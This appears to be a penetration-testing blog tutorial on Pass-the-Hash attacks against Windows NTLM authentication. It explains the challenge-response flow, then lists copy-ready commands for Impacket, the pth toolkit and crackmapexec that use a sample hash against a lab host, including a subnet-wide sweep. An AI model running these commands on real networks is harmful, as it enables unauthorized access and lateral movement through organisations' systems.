Pass the hash: Gaining access without cracking passwords
Once attackers gain a foothold into the network, they tend to expand their control by compromising additional systems and obtaining higher privileges. The techniques used for that may vary, but one of the most famous for a while is the “Pass the hash” technique. This attack uses the password hashes obtained from dumping the credentials on the compromised machine.
I invite you to check out this post, which covers the topic of dumping credentials on Windows machines :
Upon successfully dumping credentials on compromised systems, one evident step is to try and crack these credentials to obtain some clear text passwords and move easily across the network. But, cracking is never an assured method, and if it fails, it doesn’t mean we’ve reached a dead end.
Pass the hash is a lateral movement attack, that abuses the nature of the challenge-response NTLM authentification protocol to authenticate with the hash of a user’s password, instead of the clear text password.
One thing that makes this attack so popular and great, is that it always works when NTLM authentication is enabled which is by default.
How does Pass the hash work?
The NTLM authentification protocol is based on a challenge/response stream that goes as fellow :
When a client wants to authenticate to a server, it sends a NEGOTIATE_MESSAGE to request access. The server then sends a CHALLENGE_MESSAGE which is a 64-bit string that has a random and unique value on each session and asks the client to encrypt that challenge with the client’s password hash.
The Sends back an AUTHENTICATE_MESSAGE, which is the encrypted challenge, and the username among others.
On an Active Directory infrastructure, the server sends the Response and the clear-text challenge to the Domain controller, who will encrypt the challenge received with the user’s hash (which h knows) and then checks the two values, if they are identical, access is granted!
It is clear that if someone possesses the hash of a certain user, they can impersonate that user and authenticate on their behalf by using their hash to encrypt the received challenge.
How to Pass the hash?
There is a very broad variety of tools that does the task perfectly, they are dependant on the service/protocol that we will be authenticating to. Any service that relies on NTLM authentication can be employed in a pass the hash attack.
-Over SMB :
The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.
The infamous Impacket Toolkit has a bunch of python scripts that interact with different services and can be exploited to complete a pass the hash attack.
With psexec : PsExec is a legitimate Sysinternals executable, it’s a lightweight telnet replacement that lets you execute processes on other systems. PsExec’s mostly used for launching interactive command prompts on remote systems. It operates on SMB.
Impacket has thankfully blessed us with its script for psexec, It takes the user’s hash, username, and IP address of the target machine. The good thing about it is that it gives back an interactive system shell, unlike tools like smbclient that gives back an SMB shell (semi-interactive). The bad side about it tho is that it’s a little bit noisy!
After connecting to the ADMIN$ share (which is a hidden administrative share that allows system administrators to have remote access to every disk volume on a network-connected system), Psexec transfers a binary to the target and places it in C:\Windows (which is where the ADMIN$ share points), then it creates a service called “PSEXECSVC”, this service points to the binary executable that’s in C:\Windows. The service is then started remotely and runs the SMBed executable.
Once the binary is run, it opens an RPC connection between the target and the attacker machine to exchange commands/outputs.
Example :
The domain used in the lab is “SSI”, and I’ll be passing the hash of “user1” to the machine that lives on 192.168.1.20, where user1 is a local administrator.
python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded user1@192.168.1.20
With smbexec : Another tool by Impacket is is smbexec.py, which interacts with SMB.
Unlike Psexec, smbexec is a stealthy tool that doesn’t transfer any executables to the target machine. Instead, it lives off the land by running the local Windows command shell.
It creates a service called “BTOBTO” in a very clever way. The service’s file name ( executable and parameters used to start the service) contains a command string that launches cmd.exe, echos the command to a bat file, redirect the output to a temp file, execute the bat file (the command), then deletes it. The attacker machine gets the temp file (that has the output) via SMB, and displays it on the semi-interactive shell. This whole process (from the creation of the service) is repeated EACH TIME the attacker types a new command (which is why it doesn’t need to transfer any binary files).
Example :
python smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20
With smbclient : Another Impacket tool is smbclient.py, it takes the NTLM hash, domain name, user name, and IP address of the target machine.
Example :
python smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20
With pth-smbclient : Another tool that can be used is pth toolkit, which is a toolkit built into kali.
The pth toolkit contains a script that interacts with SMB. pth-smbclient takes the domain name, user name, NTLM hash, and IP address of the target machine.
Example :
pth-smbclient -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20/c$
With crackmapexec : One last tool is crackmapexec, which is a really awesome post-exploitation tool that deals with attacking Active Directory networks.
crackmapexec takes the IP address, username, the NT hash, and the command that we want to execute on the target upon authentification. An awesome feature is that we can specify an IP range, crackmapexec will then attempt to pass that hash to all the live machines on that subnet, if the user is a local administrator on any of them, it will show (Pwn3d) on the line of the compromised machine.
Example :
crackmapexec smb 192.168.1.20 -u user1 -H 3d278165f6d949465b60d71d42ae7ded -x whoami
crackmapexec 192.168.1.0/24 -u user1 -d ssi -H 3d278165f6d949465b60d71d42ae7ded -x ipconfig
-Over WMI:
WMI (Windows Management Instrumentation) is the infrastructure for managing data and operations on Windows-based operating systems.
By default Windows Management Instrumentation is built into windows and allows remote access by communicating with remote procedure calls using port 135. It can be used to start a service or execute a command remotely.
With wmiexec : Impacket (we adore impacket, don’t we!) have a script that interacts with WMI to get a session on the target machine. It takes the username, hash, and IP of the target machine.
Example :
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20
With pth-wmic : There is also a variant from Pth toolkit, It is called pth-wmic.
Example :
pth-wmic -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20 “select Name from Win32_UserAccount”
-Over RPC :
Remote procedure call (RPC) is a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network’s details.
With rcpdump : Impacket’s rpcdump extracts the RPC endpoints.
Example :
python rpcdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20
With pth-rcpclient : Obviously, there is a variant from Pth toolkit. It is called rpcclient, and it launched an interactive rpc shell where we can execute RPC commands.
Example:
pth-rpcclient -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20
With atexec : atexec is an impacket tool that connects to the Task scheduler service to execute commands remotely on the target system. It works like smbexec, it creates a task (with a random name) with the command to execute in the Action section, then triggering it. After finishing the execution, it deletes the task. The result of the command execution is read from a file named the same as the task name + .tmp added to the C:\windows\temp\ directory, the file is then deleted.
It requires the user credentials, IP Address, domain, and the command to execute.
Example :
python atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded user1@192.168.1.20 whoami
Thank you for reading, and stay tuned for more :)
